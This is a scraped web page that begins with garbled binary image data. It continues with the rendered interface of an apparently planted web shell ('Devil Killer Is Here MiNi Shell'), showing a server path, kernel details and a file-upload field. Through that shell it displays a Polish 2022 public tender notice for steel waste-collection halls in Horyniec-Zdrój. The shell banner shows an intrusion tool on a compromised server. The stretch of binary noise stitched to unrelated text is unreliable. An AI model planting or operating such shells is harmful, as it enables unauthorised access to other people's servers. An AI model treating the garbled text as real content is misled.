JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221123/0045478701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie konstrukcji hal stalowych wraz z obudową </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;USŁUGI KOMUNALNE&#34; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180007749</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zdrojowa 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Horyniec-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-620</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL822 - Przemyski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">166313201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">uk_horyniec@o2.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://uslugi-horyniec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie konstrukcji hal stalowych wraz z obudową </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-92a9b5f2-6b1e-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00454787</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta), odbywa się elektronicznie przy użyciu za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: uk_horyniec@o2.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Postępowanie jest prowadzone w języku polskim. <br/>2. W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcami w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji (innych niż oferta), odbywa się elektronicznie przy użyciu za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: uk_horyniec@o2.pl. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania). <br/> 3. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy <br/> 4. Udzielanie wyjaśnień treści SIWZ:<br/>1. Każdy uczestnik postępowania może zwrócić się do zamawiającego drogą elektroniczną, za pośrednictwem miniPortalu https://miniportal.uzp.gov.pl/ oraz ePUAPu https://epuap.gov.pl/wps/portal oraz poczty elektronicznej: uk_horyniec@o2.pl z wnioskiem o wyjaśnienie lub zmianę treści SWZ. We wszelkiej korespondencji związanej z niniejszym postępowaniem zamawiający i wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>2. Zamawiający zwraca się z prośbą o dodatkowe wysyłanie zapytań w wersji edytowalnej na adres poczty elektronicznej: uk_horyniec@o2.pl.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">www.uslugi-horyniec.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych została zawarta w Rozdziale XXXI</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.2.11.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie konstrukcji hal stalowych<br/>- Hala stalowa zamknięta (2) przeznaczona na zbieranie odpadów tekstyliów i odzieży, zużytego sprzętu elektrycznego i elektronicznego, lamp fluorescencyjnych, przeterminowanych leków, odpadów papieru i tektur. W budynku będą znajdowały się kontenery, a także prasa wysokiego zgniotu. Hala będzie składała się z dwóch pomieszczeń magazynowych małych oraz jednego dużego. <br/>- Hala stalowa otwarta ze stanowiskiem do mycia pojazdów (3) przeznaczona na zbieranie zużytych opon, akumulatorów, baterii, chemikaliów, odpadów budowlanych i rozbiórkowych, szkła, odpadów metali, tworzyw sztucznych oraz mycia pojazdów obsługujących Punkt Selektywnej Zbiórki Odpadów Komunalnych.<br/>Hala stalowa zamknięta (2):<br/>powierzchnia zabudowy: 129,49m2<br/>powierzchnia całkowita (liczona po powierzchni podłóg): 122,48m2<br/>wysokość kalenicy budynku nad poziom terenu: 5,36m<br/>kubatura budynku ~598m3<br/><br/>Hala stalowa otwarta ze stanowiskiem do mycia pojazdów (3):<br/>powierzchnia zabudowy: 152,02m2<br/>powierzchnia całkowita (liczona po powierzchni podłóg): 150,65m2<br/>wysokość kalenicy budynku nad poziom terenu: 4,60m<br/>kubatura budynku ~447m3<br/>Hala stalowa zamknięta zaprojektowana na planie prostokąta, przykryta dachem dwuspadowym o kącie nachylenia połaci 15o. Hala służyć będzie jako miejsce na kontenery/pojemniki do czasowego składowania odpadów komunalnych oraz na prasę wysokiego zgniotu. Obiekt zaprojektowano w konstrukcji stalowej, obudowanej płytami warstwowymi.<br/><br/>Hala stalowa otwarta ze stanowiskiem do mycia pojazdów zaprojektowana na planie wieloboku, przykryta dachem jednospadowym o kącie nachylenia połaci 15o. Hala służyć będzie jako zadaszenie pod kontenery/pojemniki do czasowego składowania odpadów komunalnych oraz mycia pojazdów obsługujących Punkt Selektywnej Zbiórki Odpadów Komunalnych. Obiekt zaprojektowano w konstrukcji stalowej. Ściana tylna i boczne obudowane blachą trapezową.<br/>Układ konstrukcyjny<br/>Hala stalowa zamknięta, z dachem dwuspadowym, posadowiona na stopach fundamentowych. Minimalny poziom posadowienia 1,00m poniżej poziomu terenu. Dwuteowniki stalowe stanowią słupy zewnętrzne. Słupy te są przegubowo połączone z fundamentami za pomocą kotew fajkowych o średnicy 16mm, zatapianych w fundamentach na etapie fundamentowania. Dwuteowniki stalowe stanowią rygle ram. Rygle ram połączone ze sobą w kalenicy oraz w okapie ze słupami. Rygle połączone na sztywno ze słupami zewnętrznymi.<br/>Hala stalowa otwarta, z dachem jednospadowym, posadowiona na stopach fundamentowych. Minimalny poziom posadowienia 1,00m poniżej poziomu terenu. Dwuteowniki stalowe stanowią słupy zewnętrzne. Słupy te są przegubowo połączone z fundamentami za pomocą kotew fajkowych o średnicy 16mm, zatapianych w fundamentach na etapie fundamentowania. Dwuteowniki stalowe stanowią rygle ram. Rygle ram połączone na sztywno ze słupami zewnętrznymi.<br/>Ściany<br/>Hala stalowa zamknięta:<br/>Ściany zewnętrzne hali składają się z konstrukcji stalowej oraz płyt warstwowych. Stężenia ścienne zaprojektowane w polu trzecim i skrajnym prętami okrągłymi fi 16mm ze stali St3S. Pręty należy gwintować na M16. Stężenia zaprojektowane są jako elementy cięgnowe i przyjmują jedynie siły normalne rozciągające. Połączone są ze słupami za pomocą śrub. Rygle ścienne – zaprojektowane z ceowników. Ściany działowe w hali zaprojektowano w konstrukcji stalowej z płytami warstwowymi.<br/>Hala stalowa otwarta:<br/>Hala otwarta z obudowaną blachą trapezową ścianą tylną oraz bocznymi. Stężenia ścienne zaprojektowane w polach skrajnych prętów okrągłych fi 16mm ze stali St3S. Pręty należy gwintować na M16. Stężenia zaprojektowane są jako elementy cięgnowe i przyjmują jedynie siły normalne rozciągające. Połączone są ze słupami za pomocą śrub. Rygle ścienne – zaprojektowane z ceowników.<br/>Dach<br/>Projektowana hala stalowa zamknięta zostanie przykryta dachem dwuspadowym o kącie nachylenia połaci 15o. Pokryta płytami warstwowymi na płatwiach ceowych. Stężenia połaciowe – zaprojektowane w skrajnym oraz trzecim polu z prętów okrągłych fi 16mm ze stali St3S. Pręty należy gwintować na M16. Stężenia zaprojektowane są jako elementy cięgnowe i przyjmują jedynie siły normalne rozciągające. Połączone są ze słupami za pomocą śrub.<br/>Projektowana hala stalowa otwarta zostanie przykryta dachem jednospadowym o kącie nachylenia połaci 15o. Pokryta blachą trapezową T-35 na płatwiach ceowych. Stężenia połaciowe – zaprojektowane w skrajnych polach z prętów okrągłych fi 16mm ze stali St3S. Pręty należy gwintować na M16. Stężenia zaprojektowane są jako elementy cięgnowe i przyjmują jedynie siły normalne rozciągające. Połączone są ze słupami za pomocą śrub.<br/>Pokrycie w halach stalowych wykonane z blachy trapezowej w hali otwartej i z płyt warstwowych w hali zamkniętej.<br/>Hala stalowa zamknięta:<br/>Hala stalowa zamknięta doświetlona świetlikami dachowymi punktowymi, stałymi o wymiarach 95x95cm, z pokryciem z poliwęglanu wielokomorowego.<br/>W hali stalowej zamkniętej zaprojektowano wentylatory dachowe wyciągowe z silnikiem elektrycznym.<br/>Materiałami stosowanymi do wykonania robót będących tematem niniejszej specyfikacji są:<br/>- elementy ze stali – S235,<br/>Stal wbudowana w konstrukcję musi posiadać atest hutniczy.<br/>Łączenie poszczególnych elementów konstrukcji wykonywać przy pomocy spawania używając elektrod.<br/>Do transportu materiałów i sprzętu budowlanego należy stosować środki transportu, spełniające warunki ogólne podane w części ogólnej ST.<br/>Materiały i elementy mogą być przewożone dowolnymi środkami transportu. Wysyłki elementów montażowych można dokonać dopiero po wykonaniu zabezpieczeń antykorozyjnych w zakresie przewidzianym do wykonania w wytwórni. Konstrukcja powinna być załadowana na środki transportowe w taki sposób, aby podczas transportu zapewniona była stateczność elementu oraz wykluczona możliwość ich uszkodzenia.<br/>Pokrycie dachowe<br/>akres robót:<br/>wykonanie pokrycia z blachy trapezowej w hali stalowej otwartej, dodatkowo obudowa ściany tylnej oraz bocznych,<br/>wykonanie obróbek z blachy płaskiej,<br/>montaż rynien i rur spustowych.<br/>Blacha	trapezowa	T-35,	gr	0,5	mm.	Blacha	powlekana w arkuszach. Kolor blachy – grafitowy.<br/>Pozostałe:<br/>wkręty samowiercące do przykręcania arkuszy i mocowania obróbek,<br/>Elastyczny uszczelniacz dekarski, taśmy uszczelniające,<br/>Rynny wykonane ze stali powlekanej poliestrem, półokrągłe o ø 100-150 mm, łączone na uszczelki, w kolorze blachy,<br/>Rury	spustowe	ze	stali	powlekanej	poliestrem	o	śr.	80-120	mm w kolorze blachy.<br/>Technologia zasad prowadzenia robót obejmuje wykonanie montażu okien dachowych.<br/>Zakres robót obejmuje: wykonanie montażu świetlików dachowych w połaciach dachu o nachyleniu 15º, krytego płytą warstwową.<br/>Świetlik dachowy 950/950mm - stały: pokrycie z płyty poliwęglanowej wielokomorowej o klasyfikacji SRO, gr. 20mm Uk=1,4W/m2K (bezbarwnej lub mlecznej) w ramce aluminiowej CIEPŁEJ z uszczelką (ocieplonej wewnętrznym profilem PCV)montaż kołnierzy uszczelniających mających umożliwić szczelne połączenie okna z pokryciem dachowym.<br/> Izolacje cieplne.<br/>2. Zakres robót:<br/>ocieplenie	płytami	warstwowymi	z	rdzeniem	poliuretanowym	gr.10cm ścian zewnętrznych oraz dachu,<br/>ocieplenie płytami warstwowymi z rdzeniem poliuretanowym gr.6cm ścian wewnętrznych,Płyty z rdzeniem ze sztywnej pianki PIR charakteryzują się bardzo dobrym współczynnikiem przewodzenia ciepła λ= 0,022 W/mK. Z tego właśnie względu mogą one być prawie dwukrotnie cieńsze od płyt z innym rdzeniem, zapewniając nadal wymaganą izolacyjność termiczną. Zmniejsza to w znacznym stopniu koszt transportu i montażu. Ciągły, jednorodny rdzeń (możliwy do uzyskania tylko w przypadku produkcji płyt PIR na linii ciągłej) zapewnia brak liniowych mostków cieplnych i pofalowań okładzin, charakterystycznych dla płyt z rdzeniami nieciągłymi, tj. wykonanymi z pojedynczych bloków. Aplikowana w procesie produkcji ciągła uszczelka i folia aluminiowa oraz wyprofilowane krawędzie i odpowiedni kształt styku gwarantują jego wysoką izolacyjność cieplną oraz szczelność na wody opadowe, infiltrację powietrza i pary wodnej. Płyty dachowe o charakterystycznych, zwiększających wytrzymałość garbach (3 na szerokości płyty) wyróżniają się specjalnie ukształtowaną mikrokomorą zabezpieczają- ją przed kapilarnym podciąganiem wody oraz rowkami pomocniczymi ułatwiającymi dokładny montaż (możliwy do prowadzenia przez cały rok). Płyty ścienne można montować zarówno w pionie, jak i w poziomie. Płyty ścienne i dachowe cechują się dobrymi własnościami mechanicznymi, co wynika zarówno z własności samego poliizocyjanuratu, jaki trwałego, niezawodnego połączenia rdzenia z okładzinami stalowymi. Pianka PIR jest odporna na działanie mediów chemicznych, korozję biologiczną oraz nie jest atakowana przez gryzonie i owady.<br/><br/>9. Obmiar robót:<br/>Jednostkami obmiarowymi są:<br/>Powierzchnia docieplenia	[m2]<br/>Kątowniki zabezpieczające	[mb] </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45223000-6 - Roboty budowlane w zakresie konstrukcji</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybiera najkorzystniejszą ofertę, spośród nie odrzuconych, ważnych ofert złożonych w postępowaniu, na podstawie poniższych kryteriów oceny ofert.<br/>2. Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami oceny ofert: <br/>Nazwa kryterium<br/>Waga kryterium (%)<br/>Cena /C/<br/>60,00%<br/>Termin wykonania<br/>20,00%<br/>Okres gwarancji <br/>20,00%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny i kosztu </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące:<br/>1) Zdolności do występowania w obrocie gospodarczym.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3) Sytuacji ekonomicznej lub finansowej.<br/> Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>4) Zdolności technicznej lub zawodowej. <br/>O udzielenie zamówienia publicznego mogą ubiegać się wykonawca, który spełnia warunki, dotyczące zdolności technicznej lub zawodowej tj.<br/>- posiada doświadczenie zawodowe rozumiane jako należyte wykonanie jednej roboty podobnej do przedmiotu zamówienia tj. polegającej na wykonanie konstrukcji hal stalowych wraz z obudową w okresie ostatnich 3 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy w tym okresie) polegających na realizacji robót obejmujących swym zakresem roboty budowlane o wartości nie niższej niż 500 000,00 brutto zł.<br/>2. Sposób spełniania warunków udziału w postępowaniu przez wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>Warunek dotyczący zdolności technicznej lub zawodowej, o którym mowa w ust. 1, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia zrealizuje wymagane roboty budowlane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, zamawiający żąda złożenia wraz z ofertą wypełnione oświadczenie o braku podstaw do wykluczenia – wg wzoru na załączniku nr 3 do SWZ.<br/>2. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 Pzp, jeżeli udowodni zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>1) naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne; <br/>2) wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub zamawiającym;<br/>3) podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności: <br/>a) zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie wykonawcy, zreorganizował personel<br/>b) wdrożył system sprawozdawczości i kontroli, <br/>c) utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów, e) wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów. <br/>3. Zamawiający ocenia, czy podjęte przez wykonawcę czynności, o których mowa w ust. 2, są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu wykonawcy. Jeżeli podjęte przez wykonawcę czynności, o których mowa w ust. 2, nie są wystarczające do wykazania jego rzetelności, zamawiający 